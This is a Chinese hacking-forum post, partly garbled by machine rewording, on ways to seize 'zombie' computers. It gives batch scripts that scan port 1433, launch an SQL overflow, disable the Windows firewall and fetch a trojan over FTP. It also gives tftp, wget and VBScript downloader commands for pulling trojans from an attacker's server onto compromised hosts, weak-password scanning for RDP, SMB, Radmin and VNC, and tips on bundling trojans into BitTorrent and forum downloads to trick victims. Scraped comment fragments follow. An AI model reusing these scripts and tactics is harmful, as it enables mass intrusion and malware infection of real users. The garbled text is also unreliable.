抓肉鸡的几种方法
找点道具就OK了网关抓肉鸡的几类方式 肉鸡大伙儿都应当清晰是什么吧!呵呵呵 其实就很难说了.............渐渐地学
1、3389捉鸡
如今中国互联网上相传着这种克隆版的XP,安裝之后默认设置打开1个账户为new,登陆密码为空的帐户,并且大部分全是开着3389的,人们就能够运用这一些来抓肉鸡。最先用端口扫描工具扫每段IP的3389网关,扫完后就立即用远程桌面连接開放3389的设备(还可以把結果储存为文本文档,用成批转化成3389联接的道具来联接),随后键入账户new登陆,假如他人的电脑手机没有人得话我也能够去你的空間下載你传好的木马病毒安裝拉~~
这类方式只针XP体系,假如碰到2000或是2003体系就不必试了
呵呵呵。缺陷也很显著,假如他人没有用new账户登陆XP的,你再登陆上来就会把他挤出去(XP只适用单用户登陆,客户登陆必须用道具开),或是电脑手机许多人我也并不是去开启IE下載木马病毒了。
2、扫135网关抓肉鸡
最先先加端口扫描器扫每段IP的135网关,随后把結果储存,再用NTSCAN过虑有弱动态口令的设备,最终用recton开telnet传马。由于如今135和445网关都被防火墙屏蔽掉,只有扫当地的135肉鸡,要抓异地的只有用异地的135肉鸡来扫。(详尽动画片
能够去黑客网站检索135)
3、扫445网关抓肉鸡
和扫135抓肉鸡类似,最先先加端口扫描器扫每段IP的445网关,随后把結果储存,再用NTSCAN过虑有弱动态口令的设备,最终用啊D工具包开共享资源传马。由于如今135和445网关都被防火墙屏蔽掉,只有扫当地的445肉鸡,要抓异地的只有用异地的445肉鸡来扫。(详尽动画片能够去黑客网站检索445)
4、1433网关成批上溢抓肉鸡
这一方式能够建立自动式捉鸡,只有如今太几十人搞,通过率早已太低了。要采用的道具:S扫sqlhello.exenc.exe批处理文件最先先写个批处理,开启记事本,把下列编码拷贝改动后,存储为扫面+上溢.bat文档
@echooff
for/f"eol=;tokens=1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
也要新创建1个tt.txt,里边你可以扫的IP段,文件类型为
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,正中间是空格
1433是要扫面的网关,1000是扫面线程数,dosqlhello%%i
1433xxx.xxx.xx.xx556这一里的XXX添你的IP,556是后边NC监
听的网关随后再写个批处理
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(以2进制传送数据)
echogetxxx.exe(你的木马病毒的文件夹名称,要放到主目录下)>>daima.txt
echobye>>daima.txt
netstopsharedaccess(关掉WINDOWS内置防火墙)
ftp-s:daima.txt
xxx.exe(都是填你木马病毒的文件夹名称)
deldaima.txt
留意上边的编码回车符别删除,否则就无法下你的马了。
几类肉鸡文件上传的方式
tftp法
先往自身某设备上建个tftp虚拟主机,如实行tftpd32.exe,
再将文档(sample.exe)上传入其他设备中(肉鸡),
肉鸡cmd中实行:tftp-i虚拟主机ipgetsample.exe
ftp法
肉鸡cmd中实行:
echoopenftp虚拟主机ip[网关]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
道具法
运用wineggdrop的wget.exe
肉鸡cmd中实行:wget网址/sample.exe
运用dl.vbe法
肉鸡cmd中实行:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp:/sample.exesample.exe
运用Http网址vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET","http:/sample.exe",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389法
能够开3389,随后登录,开展当地的下載。该方式对业务
器发送很严苛的设备特合理。(包含企业防火墙)
先开启好几个NC.bat,随后再开启扫面+上溢.bat,
6、用WINNTAutoAttack扫SA弱动态口令抓肉鸡
我觉得这一机理和上边相同,速率也没上边的高,仅仅想让大
家了解下,呵呵呵。
道具:WINNTAutoAttackSQL开发利用道具
开启WINNTAutoAttack,找每段IP添上,随后只勾上设定下
的仅对PING查验取得成功的设备开展检验和SQL列举登陆密码为空的SA
账户,然后开使扫面,扫完后,用SQL开发利用道具连发送马
实行就好啦。
7、扫4899空动态口令抓肉鸡
道具:端口扫描器4899探测仪Radmin
最先先加端口扫描器扫每段IP的4899网关,随后用4899检测
器导进开过4899网关的IP,然后扫空令,最终用Radmin联接有
空动态口令的设备,带开文件管理,发送的你木马病毒运作就OK了。
详尽动画片能够去黑客网站检索4899
8、扫5900网关抓VNC肉鸡
道具:VNC扫描枪VNC接插件
最先用VNC扫描枪扫面每段IP,扫面文件类型为vscan.exe(扫面
器文件夹名称)-i219.0.0.0-219.255.255.255(扫面IP段)-p5900-
vnc-vv扫面进行之后在扫描枪所属的相同文件夹名称转化成1个文
本文档,开启后有某列IP,IP后边的有某些英语词例如
patched,banned,vulnerable,只能英语词为vulnerable能够联接。然后
就用VNC接插件联接,下边就无需再多了吧?详尽动画片能够去
黑客网站检索VNC
接着心情说说挂马抓肉鸡吧。方式有许多,例如BT挂马、免費
空間挂马、迅雷挂马这些,一些因为我还不容易,呵呵呵。下边就介
绍几类我能的。
1、BT挂马
说白了,也是把我的木马病毒公布到BT网址令人下載。这样的话假如只把只是的木马病毒文档公布上来作用显然不太好,并且如今通常的BT网址也不许公布EXE文档。因此人们必须某些掩藏的技巧。人们能够先把木马病毒用捆绑器和某些影片、歌曲、手游捆缚合为一体,再压缩成RAR文档公布,谁在开始下载时候了解RAR里有木马病毒呢?当他费了很大劲下載完,开启发觉是EXE的文件类型后,总一些莱鸟会不愿错过自身花销的時间而禁不住开启吧?特别是在是下XXX片的当时这样的话你还可以做个网页木马,随后把我网页木马的地点插进到你公布的文档中(并不一定文档能够那样的,我只了解RM和EXE文档能够插进),他人下載开启后一起也会带开你的网页木马,假如他的体系沒有补供你网页木马所运用的木马病毒得话,那他就会中你的马了。一些盆友将会会想,把我木马病毒和别的文档捆缚后文件类型维持为哪个文档(例如RM捆缚木马病毒后维持RM文件类型),那么他人不就不容易猜疑何时?呵呵呵,假如真有那样的好的事情那我上边独往说把木马病毒和BT种子文件绑合为一体公布,那么你肉鸡不抓疯掉才怪~~因此这儿说一会儿,木马病毒和别的文档捆缚后转化成的文档只有为EXE文件类型的,除非你有了你所捆缚文档的文件类型的上溢木马病毒,那么能够把转化成后的格式文件维持为了你所捆缚文档的文件类型。只有那样的木马病毒如今
非常少,大部分都被补了,即使有他人也未必会公布,为何想着就知道吧。这儿却说1个近期的RAR上溢木马病毒,对于winrar3.7板本下列的全部板本,如果你winrar板本小于3.6,运作绑了牧马的RAR文档后就会中马。该类木马病毒病症为:运作RAR文档之后跳出1个什么什么什么毁坏還是不正确的提示框,随后RAR文档容积缩小,降低的容积就为木马病毒的容积。随后再度开启这一RAR文档没问题,不容易跳出不正确提示框。这儿提示下诸位赶紧升级下WINRAR板本,小心里马哈。
2、免费空间挂马
我觉得和BT类似,也是把搞好的木马病毒上传入你申报的免费空间,随后到社区论坛发些诱惑性的贴子让他人下載你的木马病毒。优势是无需像BT那么做種子,那么不但要开着笔记本,还危害网络速度。我近几天就这样挂的,弄个免费空间,发送个木马病毒,到2个XXX社区论坛发了贴子,每日临睡一顶。 www.hookbase.com 上边有许多能够学的,不清晰的问一下我
搜藏搜藏
回应 应用物品 检举
相关文章
- 5条评论
- 南殷野侃2022-05-28 21:24:58
- BT网址也不许公布EXE文档。因此人们必须某些掩藏的技巧。人们能够先把木马病毒用捆绑器和某些影片、歌曲、手游捆缚合为一体,再压缩成RAR文档公布,谁在开始下载时候了解RAR里有木马病毒呢?当他费了很大劲下載完,开启发觉是EXE的文件类型后
- 萌懂疚爱2022-05-28 10:55:03
- 一会儿,木马病毒和别的文档捆缚后转化成的文档只有为EXE文件类型的,除非你有了你所捆缚文档的文件类型的上溢木马病毒,那么能够把转化成后的格式文件维持为了你所捆缚文档的文件类型。只有那样的木马病毒如今非常少,大
- 忿咬聊慰2022-05-28 12:22:17
- 布到BT网址令人下載。这样的话假如只把只是的木马病毒文档公布上来作用显然不太好,并且如今通常的BT网址也不许公布EXE文档。因此人们必须某些掩藏的技巧。人们能够先把木马病毒用捆绑器和某些影片、歌曲、手游捆缚合为一体,再压缩成RAR文档公布,谁在开始下载时候了解RAR里有木马病毒呢?当
- 孤鱼颜于2022-05-28 13:15:38
- ody:aso.savetofile.arguments(1),2:endwith>dl.vbecscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe运用iget.vbe法方式同4,肉鸡cmd中实行:echoiLoca
- 末屿千纥2022-05-28 10:35:14
- 备开展检验和SQL列举登陆密码为空的SA账户,然后开使扫面,扫完后,用SQL开发利用道具连发送马实行就好啦。7、扫4899空动态口令抓肉鸡道具:端口扫描器4899探测仪Radmin最先先加